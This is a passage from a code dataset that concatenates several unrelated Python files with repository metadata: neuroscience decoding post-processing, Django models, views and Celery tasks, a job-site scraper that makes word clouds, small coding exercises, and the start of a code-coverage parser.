boolean\n\n    '''\n\n    my_targets_flat = my_targets[:,0]\n    my_preds_flat = [my_preds[pi][:,0] for pi in range(my_preds.shape[0])]\n    assert len(my_targets_flat.shape)==1\n    assert np.all(np.array([len(p.shape) for p in my_preds_flat])==1)\n    \n    if score_name == 'balanced_acc_test':\n        calc_score = lambda x: balanced_accuracy_score(my_targets_flat, x)\n    elif score_name == 'R2_test':\n        calc_score = lambda x: r2_score(my_targets_flat, x)\n    my_calc_real_scores = [calc_score(p) for p in my_preds_flat]\n    isequal_scores = [np.isclose(my_calc_real_scores[i],real_scores[i]) for i in range(len(real_scores))]\n    return np.all(np.array(isequal_scores))\n\n\ndef create_pdtable_from_raw(res, \n                            score_name='balanced_acc_test',\n                            N_PSEUDO=200, N_RUN=10, \n                            N_PSEUDO_LOWER_THRESH = np.infty,\n                            RETURN_X_Y=False,\n                            SCALAR_PER_TRIAL=True,\n                            SAVE_REGRESSORS=True):\n    '''\n    Takes formatted outputs of decoders and aggregates important values for post-processing\n    including subject, eid, region, test statistic, p-value, median of null distribution,\n    number of units used for decoding, fraction of weights which exceed a threshold of 0.1, \n    and the gini index of the weights to capture sparsity.\n    Optionally returns a secondary table which also includes all the regressors, targets,\n    predictions, and weights.\n\n    Parameters\n    ----------\n    res : pandas DataFrame \n        formatted as done in the output of 04_format_slurm.py.\n    score_name : str, optional\n        'balanced_acc_test' or 'R2_test'. The default is 'balanced_acc_test'.\n    N_PSEUDO : int, optional\n        from settings.py. The default is 200.\n    N_RUN : int, optional\n        from settings.py. The default is 10.\n    N_PSEUDO_LOWER_THRESH : scalar, optional\n        if finite, allows processing of outputs when not all N_PSEUDO nulls are present. \n        The default is np.infty.\n    RETURN_X_Y : bool\n        Only works for scalar values per trial, e.g. not wheel-speed. 
\n        returns an additional table with regressors, targets, and predictions\n        The default is False.\n    SCALAR_PER_TRIAL : bool\n        set to False if decoding multiple values per trial e.g. wheel decoding\n        The default is True.\n    SAVE_REGRESSORS : bool\n        if RETURN_X_Y then the returned xy-table's regressors columns will be empty if\n        SAVE_REGRESSORS is False. Either way, the same checks are done on the regressors'\n        representation; they are just not saved.\n        The default is True.\n\n    Returns\n    -------\n    pandas DataFrame \n        summary of all decoding test statistics, p-values, weight analysis, and units.\n    pandas DataFrame\n        Optional, only returned if RETURN_X_Y.\n        summary of all decoder regressors, targets, and weights\n\n    '''\n    if not score_name in ['balanced_acc_test', 'R2_test']:\n        raise NotImplementedError('this score is not implemented')\n    \n    res_table = []\n    xy_table = []\n    \n    for eid in np.unique(res['eid']):\n        print(f'working on {eid}')\n        reseid = res.loc[res['eid']==eid]\n        subject = np.unique(reseid['subject'])\n        assert len(subject) == 1\n        subject = subject[0]\n        \n        #print(reseid['region'])\n        for reg in np.unique(reseid['region']):\n            \n            reseidreg = reseid.loc[reseid['region']==reg]\n            eidreg_probes = np.unique(reseidreg['probe'])\n            assert len(eidreg_probes) == 1 \n            \n            pids = np.sort(np.unique(reseidreg['pseudo_id']))\n            #print(reseidreg.head())\n            if len(pids) == N_PSEUDO+1:\n                assert pids[0] == -1\n                assert np.all(pids[1:] == np.arange(1,N_PSEUDO+1))\n                real_scores = [get_val_from_realsession(reseidreg, \n                                                        score_name, \n                                                        RUN_ID=runid) for runid in range(1,N_RUN+1)]\n                #real_scores = reseidreg.loc[reseidreg['pseudo_id']==-1,score_name]\n                #assert len(real_scores) == N_RUN\n            # elif len(pids) >= N_PSEUDO_LOWER_THRESH+1 and pids[0] == -1:\n            #     print('not full pseudo_ids', len(pids))\n            #     real_scores = reseidreg.loc[reseidreg['pseudo_id']==-1,score_name]\n            #     assert len(real_scores) >= N_RUN - 1\n            \n            else:\n                print(f'skipping eid ({eid}) and region ({reg}) because only {len(pids)} pseudo_ids are present')\n                continue\n            \n            ws = list(reseidreg.loc[reseidreg['pseudo_id']==-1, 'weights'])\n            my_weights = np.stack(ws)\n            assert len(ws)==N_RUN\n            ws = np.abs(np.ndarray.flatten(my_weights))\n            #print(ws)\n            frac_lg_w = np.mean(ws > 0.1)#1.0/len(ws))\n            gini_w = gini(ws)\n            # 10 repeats of decoding to reduce variance\n            score = np.mean(real_scores)\n            \n            # include real score in null scores\n            n_runs_per_p = [len(np.array(reseidreg.loc[reseidreg['pseudo_id']==pid,score_name])) for pid in pids]#[1:]\n            assert np.all(np.array(n_runs_per_p)==N_RUN)\n            p_scores = [np.mean(reseidreg.loc[reseidreg['pseudo_id']==pid,score_name]) for pid in pids]#[1:]\n            if np.any(np.isnan(p_scores)):\n                print(f'skipping eid ({eid}) and region ({reg}) because {np.sum(np.isnan(p_scores))} scores are nan')\n                continue\n            \n            median_null = np.median(p_scores)\n            pval = np.mean(np.array(p_scores)>=score)\n            n_units = np.array(reseidreg.loc[reseidreg['pseudo_id']==-1,'N_units'])\n            assert np.all(n_units == n_units[0])\n            n_units = n_units[0]\n            \n            if RETURN_X_Y:\n                \n                # load regressors\n                my_regressors = get_val_from_realsession(reseidreg, 'regressors')\n                if my_regressors is None:\n                    print(f'skipping eid ({eid}) and region ({reg}) because regressors are not present')\n                    continue\n\n                # load cluster uuids\n                my_cuuids = [get_val_from_realsession(reseidreg,\n                                                      'cluster_uuids',\n                                                      RUN_ID=runid) for runid in range(1,N_RUN+1)]\n                if np.any(np.array([c is None for c in my_cuuids])):\n                    print(f'skipping eid ({eid}) and region ({reg}) because cluster uuids are not present')\n                    continue\n                
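# all runs decode the same population of units, so each run's cluster uuid\n                # list should agree element-wise; keep a single copy once verified.\n                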
assert np.all([np.all(np.array(my_cuuids[0])==np.array(c)) for c in my_cuuids])\n my_cuuids = my_cuuids[0]\n \n # load targets\n my_targets = get_val_from_realsession(reseidreg, 'target')\n if my_targets is None:\n print(f'skipping eid ({eid}) and region ({reg}) because targets are not present')\n continue\n \n # load predictions\n my_preds = [get_val_from_realsession(reseidreg, \n 'prediction', \n RUN_ID=runid) for runid in range(1,N_RUN+1)] \n my_preds = np.stack(my_preds)\n assert my_preds.shape[0] == N_RUN\n \n if np.any(np.array([mps is None for mps in my_preds])):\n print(f'skipping eid ({eid}) and region ({reg}) because predictions are not present')\n continue\n\n my_intercepts = np.stack(list(reseidreg.loc[reseidreg['pseudo_id']==-1, 'intercepts']))\n my_idxes = np.stack(list(reseidreg.loc[reseidreg['pseudo_id']==-1, 'idxes_test']))\n\n # load parameters\n my_params = [get_val_from_realsession(reseidreg, \n 'params', \n RUN_ID=runid) for runid in range(1,N_RUN+1)] \n if np.any(np.array([mps is None for mps in my_params])):\n print(f'skipping eid ({eid}) and region ({reg}) because params are not present')\n continue\n my_params = [[[(k,mp_fold[k]) for k in mp_fold.keys()] for mp_fold in mp_run] for mp_run in my_params]\n my_params = np.stack(my_params)\n assert my_params.shape[0] == N_RUN\n \n # load mask\n my_masks = [get_val_from_realsession(reseidreg, \n 'mask', \n RUN_ID=runid) for runid in range(1,N_RUN+1)]\n my_masks_trials_and_targets = [get_val_from_realsession(reseidreg,\n 'mask_trials_and_targets',\n RUN_ID=runid) for runid in range(1,N_RUN+1)]\n my_masks_diagnostics = [get_val_from_realsession(reseidreg,\n 'mask_diagnostics',\n RUN_ID=runid) for runid in range(1,N_RUN+1)] \n \n if np.any(np.array([m is None for m in my_masks])):\n print(f'skipping eid ({eid}) and region ({reg}) because mask is not present')\n continue\n assert np.all(np.array(my_masks)==my_masks[0])\n #print(type(my_masks[0]), my_masks[0].shape)\n my_mask = str(my_masks[0])\n my_mask = [int(my_mask[mi]) for mi in range(len(my_mask))]\n assert np.all(np.unique(my_mask)==np.array([0,1]))\n \n \n # check arrays\n assert my_targets.shape == my_preds[0].shape\n assert my_regressors.shape[0] == my_targets.shape[0]\n assert np.sum(my_mask) == my_targets.shape[0]\n if SAVE_REGRESSORS: # TODO, hack for wheel, check why this fails for wheel\n assert len(my_cuuids) == my_regressors.shape[-1]\n #if np.any(np.array([len(np.unique(my_preds[pi]))==1 for pi in range(my_preds.shape[0])])):\n #print(f'at least one pred is constant {eid} {reg}', )\n #continue\n \n if SCALAR_PER_TRIAL:\n check_preds = (my_preds > 0.5) if score_name == 'balanced_acc_test' else my_preds\n \n #print('############# debugging ###################')\n #my_preds_flat = [my_preds[pi][:,0]>0.5 for pi in range(my_preds.shape[0])]\n #my_targets_flat = my_targets[:,0]\n #assert len(my_targets_flat.shape)==1\n #assert np.all(np.array([len(p.shape) for p in my_preds_flat])==1)\n\n #if score_name == 'balanced_acc_test':\n #calc_score = lambda x: balanced_accuracy_score(my_targets_flat, x)\n #elif score_name == 'R2_test':\n # calc_score = lambda x: r2_score(my_targets_flat, x)\n \n #print('shapes')\n #print(my_preds_flat[0].shape, my_targets_flat.shape)\n #print('errors')\n #errs = (my_preds_flat[0] != my_targets_flat)\n #print(np.nonzero(errs))\n #print(my_preds_flat[0])\n #print(real_scores)\n \n #my_calc_real_scores = [calc_score(p) for p in my_preds_flat]\n #print(my_calc_real_scores)\n #isequal_scores = [np.isclose(my_calc_real_scores[i],real_scores[i]) 
for i in range(len(real_scores))]\n #print('return', np.all(np.array(isequal_scores)))\n \n \n \n if not check_scores(check_preds, \n my_targets, \n score_name, \n real_scores):\n #print(my_preds, check_preds, my_targets, real_scores)\n raise ValueError('recorded scores do not match calculated scores')\n \n res_table.append([subject,\n eid,\n reg,\n score,\n pval,\n median_null,\n n_units,\n frac_lg_w,\n gini_w])\n if RETURN_X_Y:\n if not SAVE_REGRESSORS:\n my_regressors = []\n xy_table.append([f'{eid}_{reg}', \n my_regressors, \n my_targets, \n my_preds,\n my_mask,\n (my_masks_trials_and_targets, my_masks_diagnostics),\n my_weights,\n my_intercepts,\n my_idxes,\n my_params,\n my_cuuids])\n \n res_table = pd.DataFrame(res_table, columns=['subject',\n 'eid',\n 'region',\n 'score',\n 'p-value',\n 'median-null',\n 'n_units',\n 'frac_large_w',\n 'gini_w'])\n \n if RETURN_X_Y:\n xy_table = pd.DataFrame(xy_table, columns=['eid_region',\n 'regressors',\n 'targets',\n 'predictions',\n 'mask',\n 'mask_diagnostics',\n 'weights',\n 'intercepts',\n 'idxes',\n 'params',\n 'cluster_uuids'])\n return res_table, xy_table\n \n return res_table\n","repo_name":"int-brain-lab/paper-brain-wide-map","sub_path":"brainwidemap/decoding/functions/process_outputs.py","file_name":"process_outputs.py","file_ext":"py","file_size_in_byte":19180,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"28333364904","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 5 05:49:37 2021\n\n@author: iviti\n\"\"\"\nimport pygame\nimport time\nimport random\nimport math\n#bulletList = []\n#npcList = [] #list of npcs\n\nreloadTime = 4 #time betwen shots\nspawnRate = 30\nbulletRange = 15 #distance at which bullet hits someone\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0,0,255) \nYELLOW = (128,128,0)\nGREY = (100,100,100)\nscreenSize = [1000, 700]\nscreen = pygame.display.set_mode(screenSize)\nnNpcs = 1 #number of npcs\nbaseRange = 50\nnTeams = 2 #number of npc teams + 1 (player)\nnBases = 2\nplayerSpawnRate = 5\nplayerReloadTime = 2\n","repo_name":"skywo1f/gamjam","sub_path":"constants_h.py","file_name":"constants_h.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2060164642","text":"from django.db import models\n\n# Create your models here.\n\n\nclass ProducerModel(models.Model):\n mal_id = models.IntegerField(unique=True, blank=False, null=False, db_index=True)\n name = models.CharField(\n unique=True,\n max_length=50,\n default=\"\",\n null=False,\n blank=False,\n db_index=True,\n )\n type = models.CharField(max_length=50, default=\"\", null=False, blank=False)\n\n def __str__(self) -> str:\n return f\"{self.mal_id}. 
{self.name} ({self.type})\"\n\n    class Meta:\n        verbose_name = \"Producer\"\n        verbose_name_plural = \"Producers\"\n","repo_name":"Arc0687/anime.arc","sub_path":"backend/django_core/apps/producers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"40362684449","text":"import requests,re\n\nurls = 'https://www.zhihu.com/search?q=%E6%B5%B7%E5%8D%97&type=content'\n# data = {\n#     'q': '海南',\n#     'range': 1,\n#     'type': 'content'\n# }\nheaders = {\n    'Accept-Encoding': 'gzip, deflate, br',\n    'Accept-Language': 'zh-CN,zh;q=0.9',\n    'Connection': 'keep-alive',\n    # 'Content-Encoding': 'gkb',\n    # 'Content-Length': 363,\n    'Content-Type': 'application/x-protobuf',\n    'Referer': 'https://www.zhihu.com/',\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36'\n\n    }\nrep = requests.post(urls,headers=headers)\nrep.encoding = 'utf-8'\ntext = rep.text\nprint(text)","repo_name":"bigbiggh/script","sub_path":"PytestLearn/demo01/test_Scrapy.py","file_name":"test_Scrapy.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34202713635","text":"# -*- coding = utf-8 -*-\n# @Time : 2020/10/21 19:13\n# @Author : LiJunChao\n# @File : test.py\n# @SoftWare : PyCharm\n\n\nimport time\nimport jieba\nfrom wordcloud import WordCloud\nimport re\nimport urllib.request,urllib.error\nfrom jieba import analyse\nfrom bs4 import BeautifulSoup\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nimport numpy as np\n\n\ndef main():\n    url = \"https://www.liepin.com/zhaopin/?\"\n    jobs = ['%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98',\n            '%E5%9B%BE%E5%83%8F%E7%AE%97%E6%B3%95%E5%B7%A5%E7%A8%8B%E5%B8%88',\n            'Java%E5%90%8E%E7%AB%AF',\n            '%E4%BA%92%E8%81%94%E7%BD%91%E4%BA%A7%E5%93%81%E7%BB%8F%E7%90%86'] # the different occupations (URL-encoded)\n    citys = ['北京', '上海', '深圳', '广州', '武汉', '杭州']\n    job = ['数据挖掘', '图像算法工程师', 'java后端', '互联网产品经理']\n    cityIds = ['010', '020', '050090', '050020', '170020', '070020']\n\n    geturls(url,jobs,cityIds,citys,job)\n\njoblink = re.compile(r'\" href=\"(.*)\" target=\"_blank\">') # regex to match job posting links\nasklink = re.compile('

[\\s\\S]*?(?<=任职资格|任职要求)[::]?([\\s\\S]*?)(?<=
)?
')\n\ndef geturls(url,jobs,cityIds,citys,job):\n    for k in range(1,2):# 0-4 selects the different occupations\n        for j in range(0,1): # 0-6 selects the URLs for the different cities\n            urls = url + 'key=' + jobs[k] + '&dqs=' + cityIds[j]\n            getData(urls,job[k],citys[j])\n\ndef askurl(urls):\n    try:\n        head = {\n            #\"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)\"\n            #\"User-Agent\": \"SafariWin7:Mozilla / 5.0(WindowsNT6.1;WOW64) AppleWebKit / 534.50(KHTML, likeGecko) Version / 5.1Safari / 534.50\"\n            \"User-Agent\":\"Mozilla / 5.0(WindowsNT6.1;WOW64) AppleWebKit / 535.1(KHTML, likeGecko) Chrome / 14.0.835.163Safari / 535.1\"\n        }\n        urls = urllib.request.Request(urls,headers=head)\n        #urls = urllib.request.Request(urls)\n        request = urllib.request.urlopen(urls)\n        html = request.read().decode(\"utf-8\")\n    except urllib.error.URLError as e:\n        if hasattr(e,\"code\"):\n            print(e.code)\n        if hasattr(e,\"reason\"):\n            print(e.reason)\n    return html\n\n\n# extract the posting URLs from the result pages\ndef getData(urls,jobs,city):\n    zhaopin = []\n    for i in range(0, 1): # 0-10 selects the result pages\n        urls = urls + '&curPage=' + str(i)\n        html = askurl(urls) # pass the generated URL to askurl to fetch the page\n        print(html)\n        soup = BeautifulSoup(html,\"html.parser\")\n        for item in soup.find_all('div',class_=\"job-info\"):\n            #print(item)\n            item = str(item) # findall only accepts strings\n            wz = re.findall(joblink,item)\n            wz = wz[0].replace(\"[,',]\", \"\") # strip brackets and quotes\n            wz = str(wz) # convert the URL to a string for matching and storage\n            if wz.find(\"https\") == -1: # prefix non-conforming URLs before storing\n                wz = 'http://www.liepin.com/' + wz\n                zhaopin.append(wz)\n            else:\n                zhaopin.append(wz)\n            time.sleep(0.2)\n            #print(wz)\n    # require = []\n    saveData(zhaopin) # save the URLs to zhaopin.txt\n    findask(zhaopin) # extract the job requirements\n    creatwordcloud(jobs,city) # generate the word cloud\n\n\n\n# save the posting URLs\ndef saveData(zhaopin):\n    filepath = \"zhaopin.txt\"\n    f = open(filepath,\"w\")\n    for i in range(len(zhaopin)):\n        f.write(zhaopin[i]+'\\n')\n    f.close()\n\n\ndef findask(zhaopin):\n    require = []\n    f = open(\"ask.txt\",\"w\")\n    for i in range(len(zhaopin)):\n        urls = zhaopin[i]\n        html = askurl(urls)\n        #print(html)\n        soup = BeautifulSoup(html,\"html.parser\")\n        for item in soup.find_all('div',class_=\"job-item main-message job-description\"):\n            item = str(item)\n            ask = re.findall(asklink, item)\n            ask = str(ask)\n            #print(ask)\n            ask = re.sub(\"[\\[\\]\\']\",\"\",ask)\n            ask = ask.replace(\"
\",'\\n')\n            ask = ask.replace(r\"\\r\\n\",\"\")\n            ask = ask.replace(r'\\n',\"\")\n            ask = ask.replace(r\"\\t\",\"\")\n            f.write(ask.encode(\"gbk\",\"ignore\").decode(\"gbk\",\"ignore\"))\n            f.write('\\n')\n            require.append(ask)\n    f.close()\n\n    clean(require) # clean the extracted data\n\ndef clean(require):\n    f = open(\"last.txt\",\"w\")\n    #f1 = open(\"keywords.txt\",\"w\")\n    for i in range(len(require)):\n        # strip list numbering and trailing separators\n        require[i] = re.sub(r'([0-9 a-z]+[\\.\\、,,))])|( [0-9]+ )|[;;]', '',require[i])\n        # remove unimportant punctuation\n        require[i] = re.sub(r'[,、。【】()/]', ' ',require[i])\n        require[i] = require[i].replace(\"xa0\",\"\")\n        f.write(require[i].encode(\"gbk\",\"ignore\").decode(\"gbk\",\"ignore\"))\n    f.close()\n\n    #require = str(require)\n    # # select keywords by TF-IDF\n    # keywords = jieba.analyse.extract_tags(require, topK=100, withWeight = False)\n    # f1.write(str(keywords))\n\n    #f1.close()\n\ndef creatwordcloud(jobs,city):\n    f = open(\"last.txt\",\"r\").read()\n\n    # select keywords by TF-IDF\n    keywords = jieba.analyse.extract_tags(f, topK=100, withWeight=False)\n    keywords = str(keywords)\n    keywords = re.sub(\"[\\[\\]\\']\",\"\",keywords)\n\n    # generate the word cloud from the keywords\n    img = Image.open('底布.png')\n    img_array = np.array(img)\n    font_path = \"C:\\Windows\\Fonts\\simfang.ttf\"\n    cloud = WordCloud(font_path = font_path,\n                      background_color = 'white',\n                      mask = img_array).generate(keywords)\n\n    # draw and save the figure\n    fig = plt.figure(1)\n    plt.imshow(cloud)\n    plt.axis(\"off\")\n    cloud.to_file('%s%s.jpg'%(jobs,city))\n\nif __name__ == '__main__':\n    main()\n","repo_name":"whut66666/findjob","sub_path":"liepin/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4290787816","text":"from __future__ import absolute_import, unicode_literals\nimport logging\nfrom celery import task\n\nfrom django.utils import timezone\nfrom datetime import timedelta\n\nfrom apps.devices.models import Device, LogAction, LogDevice\nfrom apps.rules.models import Rule\nfrom apps.rules.constants import RULE_TYPE_DEVICE, RULE_TYPE_ACTION\n\nfrom server.redis_lock import Lock\n\n\n#\n# PERIODIC TASKS\n#\n@task() # every 25 seconds\ndef update_status(id):\n    logging.info(\"UPDATE STATUS {}\".format(id))\n    # Shorten retry and delay so that we basically\n    # ignore the task and they do not pile up\n    try:\n        with Lock('TASK_DEVICE_ID_%d' % id, 4000, 0, 0.2):\n            device = Device.objects.get(id=id)\n            device.update_status()\n    except Exception as e:\n        logging.error(\"UPDATE_STATUS device %d, error %s\" % (id, e))\n\n\n@task() # every 5 minutes / do not run at the same time as update_status\ndef check_new_sms(id):\n    logging.info(\"CHECK NEW SMS {}\".format(id))\n    try:\n        with Lock('TASK_DEVICE_ID_%d' % id, 60000):\n            device = Device.objects.get(id=id)\n            device.check_new_sms()\n    except Exception as e:\n        logging.error(\"CHECK_NEW_SMS device %d, error %s\" % (id, e))\n\n\n@task() # once a day / do not run at the same time as update_status\ndef delete_sms(id):\n    #\n    # MAX OF 30 SMS; AFTER THAT, STORE THEM ELSEWHERE\n    #\n    logging.info(\"DELETE SMS {}\".format(id))\n    try:\n        with Lock('TASK_DEVICE_ID_%d' % id, 60000):\n            device = Device.objects.get(id=id)\n            device.delete_sms()\n    except Exception as e:\n        logging.error(\"DELETE_SMS device %d, error %s\" % (id, e))\n\n\n#\n# EXECUTE LOGS DEVICES / ACTIONS\n#\n@task(\n    max_retries=3,\n    default_retry_delay=2 * 60,\n    autoretry_for=(Exception,)\n)\ndef treat_log_device(action_id):\n    logging.info(\"TREAT LOG DEVICE {}\".format(action_id))\n    try:\n        log = LogDevice.objects.get(id=action_id)\n        if 
log.can_treat():\n log.treat_log()\n if log.status != 'OK':\n raise Exception(\"Status is not finish\")\n except Exception as e:\n logging.error(\"TREAT_LOG_DEVICE action %d, error %s\" % (action_id, e))\n raise e\n\n\n@task(\n max_retries=3,\n default_retry_delay=2 * 60,\n autoretry_for=(Exception,)\n)\ndef execute_action(action_id):\n logging.info(\"EXECUTE ACTION {}\".format(action_id))\n try:\n action = LogAction.objects.get(id=action_id)\n if action.can_execute():\n action.execute_action()\n if action.status != 'OK':\n raise Exception(\"Status is not finish\")\n except Exception as e:\n logging.error(\"EXECUTE_ACTION action %d, error %s\" % (action_id, e))\n raise e\n\n\n#\n# CHECK LOST LOGS DEVICES / ACTIONS\n#\n@task()\ndef check_pending_log_devices():\n logging.info(\"CHECK PENDING LOGS\")\n date_ini = timezone.now() - timedelta(minutes=50)\n date_from = timezone.now() - timedelta(minutes=10)\n logs = LogDevice.objects.filter(\n status__in=['INI', 'ERR'],\n created_at__gte=date_ini,\n created_at__lte=date_from\n )\n time = 2\n for log in logs:\n treat_log_device.apply_async([log.id], countdown=10 + time)\n time += 5\n\n\n@task()\ndef check_pending_log_actions():\n logging.info(\"CHECK PENDING ACTIONS\")\n date_ini = timezone.now() - timedelta(minutes=50)\n date_from = timezone.now() - timedelta(minutes=10)\n logs = LogAction.objects.filter(\n status__in=['INI', 'ERR'],\n created_at__gte=date_ini,\n created_at__lte=date_from\n )\n time = 2\n for log in logs:\n execute_action.apply_async([log.id], countdown=10 + time)\n time += 5\n\n\n#\n# EXECUTE RULES\n#\n@task()\ndef execute_rule_log_device(log_id):\n logging.info(\"EXECUTE ROLE LOG {}\".format(log_id))\n log = LogDevice.objects.get(id=log_id)\n\n rules = Rule.objects.filter(\n rule_type=RULE_TYPE_DEVICE,\n device=log.device,\n enabled=True\n )\n for rule in rules:\n try:\n rule.check_rule(log)\n except Exception as e:\n logging.error(\"EXECUTE_RULES log_device %d, error %s\" % (log_id, e))\n\n\n@task()\ndef execute_rule_log_action(log_id):\n logging.info(\"EXECUTE ROLE ACTION {}\".format(log_id))\n log = LogAction.objects.get(id=log_id)\n\n rules = Rule.objects.filter(\n rule_type=RULE_TYPE_ACTION,\n device=log.device,\n enabled=True\n )\n for rule in rules:\n try:\n rule.check_rule(log)\n except Exception as e:\n logging.error(\"EXECUTE_RULES log_action %d, error %s\" % (log_id, e))\n","repo_name":"edunola13/server-gsm","sub_path":"apps/devices/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70194089746","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom portfolio.models import send_a_query, newsletteremail, project_details\nfrom portfolio.forms import SendQueryForm, NewsLetterForm\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\n\n\n\n# List of views\ndef homepage(request):\n context = {\n 'name': 'Welcome Home!',\n 'current_page': ''\n }\n return render(request, 'portfolio/index.html', context)\n\n\ndef contact(request):\n if request.method ==\"POST\":\n if 'sendquerysubmit' in request.POST:\n form = SendQueryForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, (\"Query sent successfully.\"))\n return redirect(\"contact\")\n \n else:\n # import all the queries from database model - contact_details\n all_queries = send_a_query.objects.all().reverse()\n paginator = 
Paginator(all_queries, 5) # Show 5 queries per page.\n\n            page_number = request.GET.get('page')\n            all_queries = paginator.get_page(page_number)\n        \n    context = {\n        'name': 'Welcome to Contact Page',\n        'all_queries': all_queries,\n        'current_page': 'Contact'\n    }\n    return render(request, 'portfolio/contact.html', context)\n\n\ndef projects(request):\n    all_projects = project_details.objects.all()\n    paginator = Paginator(all_projects, 3) # Show 3 projects per page.\n\n    page_number = request.GET.get('page')\n    all_projects = paginator.get_page(page_number)\n    context = {\n        'name': 'Project Details',\n        'current_page': 'Projects',\n        'all_projects': all_projects\n    }\n    return render(request, 'portfolio/projects.html', context)\n\ndef gallery(request):\n    context = {\n        'name': 'Welcome to Gallery Page',\n        'current_page': 'Gallery'\n    }\n    return render(request, 'portfolio/gallery.html', context)\n\n","repo_name":"chanchalkmaurya/chanchal","sub_path":"portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71201619346","text":"# Solution for Leet code problem\r\n# Problem url https://leetcode.com/problems/how-many-numbers-are-smaller-than-the-current-number/\r\n\r\nnums = [8,1,2,2,3]\r\nans=[]\r\nfor i in range(0,len(nums)):\r\n    smaller=0\r\n    for j in range(0,len(nums)):\r\n        if(nums[i]>nums[j]):\r\n            smaller=smaller+1\r\n    ans.append(smaller)\r\nprint(ans)","repo_name":"harshareddy794/Athmanirbhar-competitive-coding-track","sub_path":"01-06-2020(DAY 1)/How Many Numbers Are Smaller Than the Current Number.py","file_name":"How Many Numbers Are Smaller Than the Current Number.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7618420039","text":"def moveZero(arr,n):\n    count = 0 # keep track of Non-zero elements\n    \n    for i in range(n):\n        if arr[i] != 0:\n            arr[i],arr[count] = arr[count],arr[i]\n            count += 1\n\n    return arr\n\nprint (moveZero([8,5,0,10,0,20],6))","repo_name":"shobhit009/Daily-practice-problem","sub_path":"Array/moveZerosAtEnd.py","file_name":"moveZerosAtEnd.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38996038018","text":"#!/usr/bin/env python\n# -*- Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-\n# vi: set ts=4 sw=4 expandtab: (add to ~/.vimrc: set modeline modelines=5)\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\n'''\nusage:\n    The script parses a bullseye code coverage binary file and generates a list of missing functions, and several csv files\n    for use with confluence tables and charts.\n\n    requirement: for the csv filename output to look correct, this script must be run with cwd set to the tamarin-redux directory\n\n    parsecodecoverage.py --covfile avm.cov --build=5110\n    env variables: $coverage_exclude_regions\n\n    input:\n    --covfile <covfile>\n    --build <build>\n    \n    output:\n    for output files the $basename is the covfile with the .cov removed e.g. 
avmshell_s_cov_64.cov produces avmshell_s_cov_64-info.csv\n    these files are created:\n    $basename-info.csv # build number and timestamp\n    $basename-summaryfn.csv # function data table for current build for table\n    $basename-summarybc.csv # branches/conditions data table for current build for table\n    $basename-missingfn.csv # list of uncovered functions\n\n    these files are appended:\n    $basename-recentfn.csv # uncovered function historical chart for this iteration (month)\n    $basename-recentbc.csv # uncovered branch/conditions historical chart for this iteration (month)\n    $basename-milestonefn.csv # uncovered function historical chart for recent iterations/milestones\n    $basename-milestonebc.csv # uncovered branches/conditions historical chart for recent iterations/milestones\n\n\n    the bullseye tool must be installed and in the path; covfn is executed from bullseye. Tested with version 7.13.32\n\n    CSV output formats:\n    $basename-missingfn.csv format: build,module name,source file name, function name\n    $basename-info.csv format (single line): build: ###, updated: YYYY-MM-DD HH:MM\n    $basename-summaryfn.csv format: module,uncovered fns,total fns,% fn cov\n    $basename-summarybc.csv format: module,uncovered branches,% branch cov,total branches,% branch cov\n\n'''\nimport getopt,os,re,subprocess,sys,datetime\n\nclass ParseCodeCoverage:\n    covfile=None\n    incsvfile=None\n    outcsvfile=None\n\n    datadir='./data'\n    missingfnfile=None\n    info=None\n    summary=None\n    fnsummary=None\n    fnpercentsummary=None\n    bcsummary=None\n    bcpercentsummary=None\n    basefile=None\n    modulelist=None\n    skips=[]\n    bullseyedir=None\n    build='unknown'\n\n    \n\n    options=''\n    longOptions=['covfile=','build=','incsvfile=']\n    region=''\n\n    def __init__(self):\n        self.parseOptions()\n\n        if os.environ.has_key('coverage_exclude_regions'):\n            self.region=os.environ['coverage_exclude_regions']\n        \n        if os.environ.has_key('bullseyedir')==False:\n            print(\"error: must set bullseyedir environment variable to the bullseye/bin directory\")\n            sys.exit(1)\n        self.bullseyedir=os.environ['bullseyedir']\n\n        # if incsvfile not set run covfn to generate the csv file\n        if 